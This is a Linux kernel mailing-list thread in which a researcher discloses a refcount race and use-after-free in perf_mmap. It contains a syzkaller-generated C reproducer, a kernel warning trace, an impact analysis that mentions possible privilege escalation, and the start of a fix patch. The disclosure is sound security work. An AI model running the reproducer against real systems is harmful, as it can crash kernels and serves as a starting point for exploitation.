C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
> Can you turn this into a patch we can apply (properly sent, real name
Hi Greg,
Sorry for not knowing the rules and sending to the wrong people mistakenly. I have just submitted the formal patch to the perf subsystem maintainers with the correct formatting and real name.
Thanks for the guidance!
Best regards,
Haocheng Yu
|
{
"author": "=?UTF-8?B?5L2Z5piK6ZOW?= <haochengyu@zju.edu.cn>",
"date": "Sun, 1 Feb 2026 19:35:31 +0800 (GMT+08:00)",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
